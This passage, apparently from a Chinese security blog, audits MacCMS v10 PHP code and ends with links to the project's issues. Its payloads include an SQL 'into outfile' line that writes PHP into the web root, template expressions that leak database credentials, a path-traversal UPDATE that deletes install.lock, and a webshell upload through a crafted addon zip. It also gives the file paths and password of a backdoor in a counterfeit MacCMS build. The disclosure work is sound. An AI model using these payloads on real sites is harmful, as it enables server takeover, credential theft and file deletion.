class="hljs-variable">$sql</span>,<span class="hljs-number">0</span>,<span class="hljs-number">6</span>))==<span class="hljs-string">&quot;select&quot;</span>)&#123;<br><br>            &#125;<br>            <span class="hljs-keyword">else</span>&#123;<br>                Db::execute(<span class="hljs-variable">$sql</span>);<br>            &#125;<br>        &#125;<br>        <span class="hljs-keyword">$this</span>-&gt;success(lang(<span class="hljs-string">&#x27;run_ok&#x27;</span>));<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;fetch(<span class="hljs-string">&#x27;admin@database/sql&#x27;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<h2 id="into-outfile-写入木马"><a href="#into-outfile-写入木马" class="headerlink" title="into outfile 写入木马"></a>into outfile 写入木马</h2><p>利用 SQL 写木马是常规操作，poc如下，加括号的原因是绕过 <code>strtolower(substr($sql,0,6))==&quot;select&quot;</code> 条件</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span> <span class="hljs-string">&#x27;&lt;?php phpinfo();?&gt;&#x27;</span> <span class="hljs-keyword">into</span> outfile <span class="hljs-string">&#x27;/var/www/1.php&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>不过这种利用方式首先要知道网站的根目录，其次还得看权限够不够</p>
<p>获取根目录上暂时没有找到好办法，不过这里有可以借用修改模板的地方，使其输出 <code>ROOT_PATH</code> 常量，这是保存 TP5 web 根目录的常量，代码如下，而且这种写法也不会被过滤，应该还是挺高效的：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;<span class="hljs-variable">$Think</span>.ROOT_PATH&#125;<br></code></pre></td></tr></table></figure>

<p>然后访问对应模板的页面获取到根目录，剩下的就是看有没有sql写文件的权限了</p>
<img src="img/maccms/image-20211111103505442.png" srcset="/img/loading.gif" lazyload alt="image-20211111103505442" style="zoom:50%;" />

<p>说到这，已经能感受到这个模板能做很多事，比如输出 TP5 的配置文件中的数据库连接参数，这样就能直接获取数据库权限</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;<span class="hljs-variable">$Think</span>.config.database.username&#125;&lt;br&gt;<br>&#123;<span class="hljs-variable">$Think</span>.config.database.password&#125;<br></code></pre></td></tr></table></figure>

<p>这里的sql执行操作其实感觉也能做很多其他的事情，如很多程序会把数据库中的内容不禁过滤写入到文件中，利用这个功能，这里还能造成任意文件写入漏洞</p>
<h2 id="任意文件删除漏洞"><a href="#任意文件删除漏洞" class="headerlink" title="任意文件删除漏洞"></a>任意文件删除漏洞</h2><p>有了执行任意 sql 的权限后，就能修改数据库的任意数据，然后我就想看看程序有没有获取数据库数据做敏感操作的地方。然后找到了一处删除文件的功能，位于【基础】-》【附件管理】</p>
<img src="img/maccms/image-20211111105816211.png" srcset="/img/loading.gif" lazyload alt="image-20211111105816211" style="zoom: 33%;" />

<p>这里介绍的漏洞位于 v2020.1000.1068 版本之后。maccms 早期也爆出过任意文件删除漏洞，<a target="_blank" rel="noopener" href="https://github.com/magicblack/maccms10/issues/346%EF%BC%8C%E5%8E%9F%E7%90%86%E5%92%8C%E8%BF%99%E9%87%8C%E5%B7%AE%E4%B8%8D%E5%A4%9A%EF%BC%8C%E4%B8%8D%E8%BF%87%E6%BC%8F%E6%B4%9E%E9%83%BD%E8%A2%AB%E4%BF%AE%E5%A4%8D%E4%BA%86">https://github.com/magicblack/maccms10/issues/346，原理和这里差不多，不过漏洞都被修复了</a></p>
<h3 id="代码分析-5"><a href="#代码分析-5" class="headerlink" title="代码分析"></a>代码分析</h3><p>删除功能的代码如下：</p>
<ul>
<li><code>$ids</code> 可以传入文件id，然后在数据库查找到id对应的文件路径 $v[‘annex_file’]，最后拼接这个文件路径删除真实文件</li>
<li>删除文件前会对真实的文件路径做验证，但这个验证方法有点问题，只需要满足 <code>file_exists($pic) &amp;&amp; (substr($pic,0,8) == &quot;./upload&quot;)</code> 或 <code>count( explode(&quot;./&quot;,$pic) ) ==1</code> 的条件就可以了。而这里路径注定会加上 <code>./</code> ，似乎 <code>count( explode(&quot;./&quot;,$pic) ) ==1</code> 条件不好满足了</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//	application/admin/controller/Annex.php</span><br><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">del</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$param</span> = input();<br>    <span class="hljs-variable">$ids</span> = <span class="hljs-variable">$param</span>[<span class="hljs-string">&#x27;ids&#x27;</span>];<br>    <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$ids</span>))&#123;<br>        <span class="hljs-keyword">if</span>(is_array(<span class="hljs-variable">$ids</span>))&#123;<br>            <span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$ids</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$k</span>=&gt;<span class="hljs-variable">$v</span>)&#123;<br>                <span class="hljs-variable">$ids</span>[<span class="hljs-variable">$k</span>] = str_replace(<span class="hljs-string">&#x27;./&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-variable">$v</span>);<br>            &#125;<br>        &#125;<br>        <span class="hljs-variable">$where</span>=[];<br>        <span class="hljs-variable">$where</span>[<span class="hljs-string">&#x27;annex_id|annex_file&#x27;</span>] = [<span class="hljs-string">&#x27;in&#x27;</span>,<span class="hljs-variable">$ids</span>];<br>        <span class="hljs-variable">$res</span> = model(<span class="hljs-string">&#x27;Annex&#x27;</span>)-&gt;delData(<span class="hljs-variable">$where</span>);<br>      	……<br><span class="hljs-comment">//	application/common/model/Annex.php</span><br><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">delData</span>(<span class="hljs-params"><span class="hljs-variable">$where</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$list</span> = <span class="hljs-keyword">$this</span>-&gt;listData(<span class="hljs-variable">$where</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-number">1</span>,<span class="hljs-number">9999</span>);<br>    <span class="hljs-variable">$path</span> = <span class="hljs-string">&#x27;./&#x27;</span>;<br>    <span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$list</span>[<span class="hljs-string">&#x27;list&#x27;</span>] <span class="hljs-keyword">as</span> <span class="hljs-variable">$k</span>=&gt;<span class="hljs-variable">$v</span>)&#123;<br>        <span class="hljs-variable">$pic</span> = <span class="hljs-variable">$path</span>.<span class="hljs-variable">$v</span>[<span class="hljs-string">&#x27;annex_file&#x27;</span>];<br>        <span class="hljs-keyword">if</span>(file_exists(<span class="hljs-variable">$pic</span>) &amp;&amp; (substr(<span class="hljs-variable">$pic</span>,<span class="hljs-number">0</span>,<span class="hljs-number">8</span>) == <span class="hljs-string">&quot;./upload&quot;</span>) || count( explode(<span class="hljs-string">&quot;./&quot;</span>,<span class="hljs-variable">$pic</span>) ) ==<span class="hljs-number">1</span>)&#123;<br>            unlink(<span class="hljs-variable">$pic</span>);<br>        &#125;<br>    &#125;<br>		……<br></code></pre></td></tr></table></figure>

<h3 id="实战利用-1"><a href="#实战利用-1" class="headerlink" title="实战利用"></a>实战利用</h3><p>maccms 有一个 install.lock 文件，删除该文件后可重新安装 maccms 系统，以删除该文件来演示这里的操作</p>
<p>1）向数据库插入要删除文件的路径</p>
<p>指定id好找文件，文件id什么的抓包就有了</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">UPDATE `maccms`.`mac_annex` <span class="hljs-keyword">SET</span> `annex_file` <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;upload/../application/data/install/install.lock&#x27;</span> <span class="hljs-keyword">WHERE</span> `annex_id` <span class="hljs-operator">=</span> <span class="hljs-number">21</span><br></code></pre></td></tr></table></figure>

<p>2）利用删除功能删除文件</p>
<img src="img/maccms/image-20211111114529647.png" srcset="/img/loading.gif" lazyload alt="image-20211111114529647" style="zoom:50%;" />







<h1 id="其他问题"><a href="#其他问题" class="headerlink" title="其他问题"></a>其他问题</h1><h2 id="后台添加视频处存在存储xss"><a href="#后台添加视频处存在存储xss" class="headerlink" title="后台添加视频处存在存储xss"></a>后台添加视频处存在存储xss</h2><p>后台添加文章和添加视频处都有存储型xss，如下图所示，很多位置都能插入xss代码。最新版v2022.1000.3024（2020.9.9更新）依然存在这个漏洞</p>
<img src="img/maccms/image-20211111145304681.png" srcset="/img/loading.gif" lazyload alt="image-20211111145304681" style="zoom: 33%;" />

<p>在前台就能访问到插入的xss代码，还是有一定的危害</p>
<img src="img/maccms/image-20211111145518664.png" srcset="/img/loading.gif" lazyload alt="image-20211111145518664" style="zoom:50%;" />

<h2 id="后台离线安装应用上传木马"><a href="#后台离线安装应用上传木马" class="headerlink" title="后台离线安装应用上传木马"></a>后台离线安装应用上传木马</h2><p>在早期版本中，后台可以上传zip压缩包，maccms会解压后保存</p>
<img src="img/maccms/image-20211111165511809.png" srcset="/img/loading.gif" lazyload alt="image-20211111165511809" style="zoom:50%;" />

<p>该功能关键代码如下图，压缩包的关键是 info.ini 文件</p>
<img src="img/maccms/image-20211111170107336.png" srcset="/img/loading.gif" lazyload alt="image-20211111170107336" style="zoom:50%;" />

<p>系统本身有一份 info.ini ，复制过来修改一下就行，我修改的 info.ini 如下，注意 name 将决定上传的目录名</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php">name = shell<br>title = test<br>intro = test<br>author = MagicBlack<br>website = http:<span class="hljs-comment">//www.maccms.la</span><br>version = <span class="hljs-number">1.0</span>.<span class="hljs-number">0</span><br>state = <span class="hljs-number">0</span><br>url = /admin.php/addons/shell.html<br></code></pre></td></tr></table></figure>

<p>然后把要上传的文件和 info.ini 放在同一目录并压缩，注意直接压缩上传的文件，压缩文件中不要有目录</p>
<img src="img/maccms/image-20211111170755895.png" srcset="/img/loading.gif" lazyload alt="image-20211111170755895" style="zoom:50%;" />

<p>上传压缩包，解压的文件将被放到 addons/shell 目录下，这里的shell就是info.ini中的name，然后访问上传的文件即可</p>
<img src="img/maccms/image-20211111174023816.png" srcset="/img/loading.gif" lazyload alt="image-20211111174023816" style="zoom:50%;" />

<h3 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>漏洞修复</h3><p>在 v2022.1000.3005 版本中（2020.12.13），该功能被禁用了，直接exit退出了</p>
<p><img src="img/maccms/image-20211111172350575.png" srcset="/img/loading.gif" lazyload alt="image-20211111172350575"></p>
<h2 id="假冒网站留后门"><a href="#假冒网站留后门" class="headerlink" title="假冒网站留后门"></a>假冒网站留后门</h2><p>上面看了 magicblack 和 maccmspro 的闹剧，其实在2019年，maccms.com 关闭后，就出现过仿冒的网站，域名为 maccmsv10.com，很多人下载了仿冒网站的源码，而源码中却留有后门</p>
<p>至今过去了两年的时间，仿冒网站也关闭了，这里就不多介绍了，估计现在使用这套代码的网站也是少之又少，这里记录一下这个版本的木马，也许运气好能遇到</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs taggerscript">maccms10<span class="hljs-symbol">\e</span>xtend<span class="hljs-symbol">\u</span>pyun<span class="hljs-symbol">\s</span>rc<span class="hljs-symbol">\U</span>pyun<span class="hljs-symbol">\A</span>pi<span class="hljs-symbol">\F</span>ormat.php<br>maccms10<span class="hljs-symbol">\e</span>xtend<span class="hljs-symbol">\Q</span>cloud<span class="hljs-symbol">\S</span>ms<span class="hljs-symbol">\S</span>ms.php<br><br>密码 WorldFilledWithLove<br></code></pre></td></tr></table></figure>



<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>本次主要审计了 MacCMS v10的代码，发现其中的问题主要在于登陆认证，模板编辑，数据库功能操作上，仔细研究代码，发现很多问题都在于作者并不熟悉 TP5 底层代码的处理</p>
<p>挂马：<a target="_blank" rel="noopener" href="https://github.com/magicblack/maccms10/issues/742">https://github.com/magicblack/maccms10/issues/742</a></p>
<p>上传木马：<a target="_blank" rel="noopener" href="https://github.com/magicblack/maccms10/issues/738">https://github.com/magicblack/maccms10/issues/738</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/php%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">php代码审计</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/PHP/">PHP</a>
                    
                      <a class="hover-with-bg" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/09/phpcms/">
                        <span class="hidden-mobile">通过 PHPCMS 学习 php 代码审计</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"KoUUnhC8sqDPadKwA0C4f83s-gzGzoHsz","appKey":"FLKClsTKX9X9TPMSO1z9FK1T","placeholder":"说点什么","path":"window.location.pathname","avatar":"robohash","meta":["nick","mail","link"],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false,"requiredFields":[]},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
